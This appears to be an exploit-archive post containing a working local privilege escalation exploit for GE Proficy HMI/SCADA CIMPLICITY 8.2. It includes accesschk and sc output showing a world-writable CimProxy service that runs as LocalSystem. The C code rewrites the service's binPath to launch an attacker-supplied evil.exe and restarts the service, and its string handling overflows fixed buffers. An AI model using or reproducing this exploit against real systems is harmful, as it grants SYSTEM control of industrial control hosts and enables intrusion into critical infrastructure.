GE Proficy HMI/SCADA CIMPLICITY 8.2 Local Privilege Escalation

`/*  
# Exploit Title: GE Proficy HMI/SCADA CIMPLICITY 8.2 Local Privilege Escalation Exploit(0 day)  
# Vulnerability Discovery and Exploit Author: Zhou Yu  
# Email: <[email protected]>  
# Version: 8.2  
# Tested on: Windows 7 SP1 X32  
# CVE : None  
  
Vulnerability Description:  
SERVICE_CHANGE_CONFIG Privilege Escalation  
C:\Users\lenovo\Desktop\AccessChk>accesschk.exe -q -v -c CimProxy  
CimProxy  
Medium Mandatory Level (Default) [No-Write-Up]  
RW Everyone  
SERVICE_ALL_ACCESS  
  
C:\Users\lenovo\Desktop\AccessChk>sc qc CimProxy  
[SC] QueryServiceConfig �ɹ�  
  
SERVICE_NAME: CimProxy  
TYPE : 10 WIN32_OWN_PROCESS  
START_TYPE : 2 AUTO_START  
ERROR_CONTROL : 1 NORMAL  
BINARY_PATH_NAME : C:\Program Files\Proficy\Proficy CIMPLICITY\exe\Cim  
Proxy.exe  
LOAD_ORDER_GROUP :  
TAG : 0  
DISPLAY_NAME : CIMPLICITY Proxy Service  
DEPENDENCIES :  
SERVICE_START_NAME : LocalSystem  
Usage:  
Put evil.exe and the exploit in the same folder and then run the exploit.  
*/  
#include <windows.h>  
#include <stdio.h>  
#include <string.h>  
void main()  
{  
char szPath[MAX_PATH];  
char *t;  
GetModuleFileName(NULL,szPath,MAX_PATH);  
t = strrchr(szPath, 0x5C);  
t[0] = '\\';  
t[1] = '\0';  
strcat(szPath,"evil.exe\"");  
char t1[] = "\"cmd.exe /c ";  
char payload[] = "sc config CimProxy binPath= ";  
strcat(t1,szPath);  
strcat(payload,t1);  
  
system(payload);  
//stop service  
printf("stop service!\n");  
system("net stop CimProxy");  
//start service  
printf("start service!\n");  
system("net start CimProxy");  
  
}  
  
`